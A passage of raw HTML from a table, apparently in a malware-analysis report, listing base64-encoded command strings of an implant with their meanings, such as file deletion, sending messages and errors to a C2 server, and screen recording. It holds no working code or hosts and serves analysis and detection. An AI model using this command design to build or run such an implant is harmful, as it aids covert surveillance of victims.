-webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">FM</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1998297230" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{168}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">File management<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">operations</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>&#x2013;<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">delete</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">file</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="16" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="680869671" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{180}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">TE4=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1823369733" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{187}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">LN</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1678244246" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{194}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Unknown</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="17" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1414433950" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{202}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SpellingErrorV2Themed SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; background-position: 0px 100%; background-repeat: repeat-x; background-image: var(--urlSpellingErrorV2,url(&quot;data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjQiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHBhdGggc3Ryb2tlPSIjRUIwMDAwIiBkPSJNMCAzYzEuMjUgMCAxLjI1LTIgMi41LTJTMy43NSAzIDUgMyIvPjxwYXRoIGQ9Ik0wIDBoNXY0SDB6Ii8+PC9nPjwvc3ZnPg==&quot;)); border-bottom: 1px solid transparent; -webkit-nbsp-mode: normal !important;">TXNn</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1986664053" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{209}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Msg</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="650220655" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{216}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Send message to C2</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="18" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="891005369" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{224}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RXJyb3I=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="180547162" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{231}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Error</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1854929042" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{238}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Error reporting back to C2</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="19" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol LastRow SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1093022703" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{246}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SpellingErrorV2Themed SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; background-position: 0px 100%; background-repeat: repeat-x; background-image: var(--urlSpellingErrorV2,url(&quot;data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjQiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHBhdGggc3Ryb2tlPSIjRUIwMDAwIiBkPSJNMCAzYzEuMjUgMCAxLjI1LTIgMi41LTJTMy43NSAzIDUgMyIvPjxwYXRoIGQ9Ik0wIDBoNXY0SDB6Ii8+PC9nPjwvc3ZnPg==&quot;)); border-bottom: 1px solid transparent; -webkit-nbsp-mode: normal !important;">cmVj</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastRow SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="388339271" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{253}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">rec</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol LastRow SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1811233859" paraeid="{32c6b2e1-0ae6-45fe-873f-7a7b6bfb88d3}{5}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Screen recording</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, 